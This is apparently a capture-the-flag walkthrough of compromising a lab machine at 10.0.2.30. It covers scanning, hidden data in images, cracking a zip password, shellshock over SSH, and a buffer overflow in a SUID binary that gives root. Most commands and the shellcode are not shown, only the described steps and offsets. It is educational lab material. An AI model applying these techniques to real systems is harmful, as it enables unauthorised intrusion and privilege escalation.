Initial Foothold

  1. Network discovery

My target is 10.0.2.30.

2. Port scan

3. OS and service scan

There’re 3 services: ftp, ssh, and http.

4. Vuln scan

There’s a ‘robots.txt’ file.

Service Enumeration

There’re 3 TCP services:

  • 21/tcp ftp vsftpd 2.0.8 or later

Connect

There’s a banner.

  • 22/tcp ssh OpenSSH 5.9p1 Debian 5ubuntu1.4

Connect

  • 80/tcp http Apache httpd 2.2.22 ((Ubuntu))
  1. Nikto scan

2. Directory scan

3. Access the site

View page source. There’s a possible username: Tr0ll.

Save it as ‘user.txt’ in case I need to use it.

Access robots.txt

Copy only directory list and save it as ‘robots_fix.txt’

4. Enum site’s directory w/ robots_fix.txt

There are only 4 directories that I can access. Others are trolls.

I started w/ ‘ok_this_is_it’. There’s a page w/ one image.

View page source

Save the image and analyze its metadata

The file size is 15 KiB.

Search for any hidden messages.

I kept repeating the steps of all path, ’til /dont_bother/

I noticed that its file size is 16 KiB which is different from others.

Use ‘strings’ to search for hidden message and there it is.

6. Access ‘y0ur_self’

There’s an ‘answer.txt’ file.

Read it. It is base-64 encoded strings. Some of them are the same string.

Download it.

Remove redundancy string.

Now It is better.

Decode it w/ cyberchef. It can import files, so it is super convenient. After decoding, I saved it as ‘decoded_answer.txt’.

Read the file

It’s a password for something.

Find an access to the machine

Now that I don't have any shell yet. There’re 2 services that need credentials: FTP and SSH.

So far I have one username: Tr0ll and a list of passwords.

  1. Starting w/ FTP, connect to the service again.

Sometimes FTP user doesn't require a password.

FAiled

Use the same username and password to log in. This time I succeeded.

There’s ‘lmao.zip’.

Download it

Unzip it.

I stuck w/ password requiring.

Crack it w/ fcrackzip. I already have passwords that I can use to crack

Now I got the password.

I got the new file, ‘noob’.

Read it

It’s a private key for SSH service.

2. Login to SSH service

Change noob permission

Starting w/ ‘Tr0ll’

It still requires a password.

I guess that username may be ‘noob’. Let’s change the username to ‘noob’

The connection was closed immediately after logging in.

Try shellshock technique w/ SSH

Now I got the shell. And I need TTY shell to work around the machine.

Privilege Escalation

  1. Explore directories as listed:

I don't find anything in these directories.

2. Verify sudo permission

I need a password.

3. LinEnum.sh

Prepare HTTP server on the attacker machine

Download it

Run it

From the bottom to the top. Here are the things that I’ve found interesting.

noob’s ‘.bash_history’. Maybe a hint to Buffer Overflow (bof).

SUID files. The last 3 records are the leads.

Access it

There’re 3 directories.

door1

There’s r00t.

door2

There’s r00t.

door3

There’s r00t.

Try run it

My connection is closed after few seconds. I have to repeat the connection step.

Let’s try door2

I have to supply input.

Maybe I can do the buffer overflow.

Buffer Overflow

  1. fuzzing

There’s a segmentation fault. I can proceed to the next step

2. Find EIP offset

Create a pattern of 500 characters

Open r00t w/ gdb

Supply the created pattern

EIP address is 0x6a413969

Find the offset

EIP offset is 268.

3. Find ESP address

Back to the gdb

The esp address is ‘0xbffffac0’

4. Overwriting EIP and confirm the offset

Quit the gdb and restart the program

After quitting r00t is dissappeared.

List the file.

Nothing

Try to run r00t in door3

Back to door2

Permission denied

Now I think that this machine has some hidden script to troll w/ me as making it harder, cease the connection, and make the file disappear.

I can use another command to verify this directory

Now I got the same file.

Open w/ gdb

Confirm the offset

Now I got 0x42424242 (“B*4”), which means the offset is correct.

5. Exploitation

I got the /bin/sh shellcode from here:

NOTE: “\x90” * 10 is NOPS.

Now, I’m root.